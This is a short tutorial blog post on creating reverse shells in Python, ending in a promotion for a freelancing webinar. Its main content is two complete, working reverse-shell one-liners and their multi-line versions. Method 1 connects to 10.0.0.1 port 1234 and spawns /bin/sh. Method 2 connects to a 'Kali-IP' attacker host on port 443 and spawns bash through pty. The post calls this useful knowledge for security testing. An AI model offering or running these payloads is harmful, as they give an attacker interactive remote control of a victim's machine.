This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:<\/p>\n
Here’s the definition of a Reverse Shell:<\/p>\n
A reverse shell<\/strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.<\/p>\n You can read more here<\/a>. In this tutorial, you’ll learn how to create a reverse shell in one line Python.<\/p>\n I found this code in a blog <\/a>thread. You can run it from any computer with Python installed and visible from your current location:<\/p>\n But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?<\/p>\n Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:<\/p>\n As you see, the code opens a socket (which is an entry point for a connection), duplicates file descriptors<\/a>, and calling a Linux shell<\/a>. Thus, it will only run on Linux-based systems.<\/p>\n In this<\/a> Github thread, I found another one-liner that opens a reverse shell:<\/p>\n When writing the equivalent multi-liner, the code looks more understandable:<\/p>\n It’s very similar to the above code but uses the Enough theory, let\u2019s get some practice!<\/p>\n To become successful in coding, you need to get out there and solve real problems for real people. That\u2019s how you can become a six-figure earner easily. And that\u2019s how you polish the skills you really need in practice. After all, what\u2019s the use of learning theory that nobody ever needs?<\/p>\n Practice projects is how you sharpen your saw in coding!<\/strong><\/p>\n Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?<\/p>\n Then become a Python freelance developer! It\u2019s the best way of approaching the task of improving your Python skills\u2014even if you are a complete beginner.<\/p>\n Join my free webinar \u201cHow to Build Your High-Income Skill Python\u201d<\/a> and watch how I grew my coding business online and how you can, too\u2014from the comfort of your own home.<\/p>\nMethod 1<\/h2>\n
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/pre>\n
import socket,subprocess,os\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"10.0.0.1\",1234))\nos.dup2(s.fileno(),0)\nos.dup2(s.fileno(),1)\nos.dup2(s.fileno(),2)\np=subprocess.call([\"\/bin\/sh\",\"-i\"])\n<\/pre>\n
Method 2<\/h2>\n
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"Kali-IP\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\/bin\/bash\")'<\/pre>\n
import pty\nimport socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((\"Kali-IP\",443))\nos.dup2(s.fileno(),0)\nos.dup2(s.fileno(),1)\nos.dup2(s.fileno(),2)\npty.spawn(\"\/bin\/bash\")\n<\/pre>\n
pty<\/code> library to create the shell. <\/p>\nWhere to Go From Here?<\/h2>\n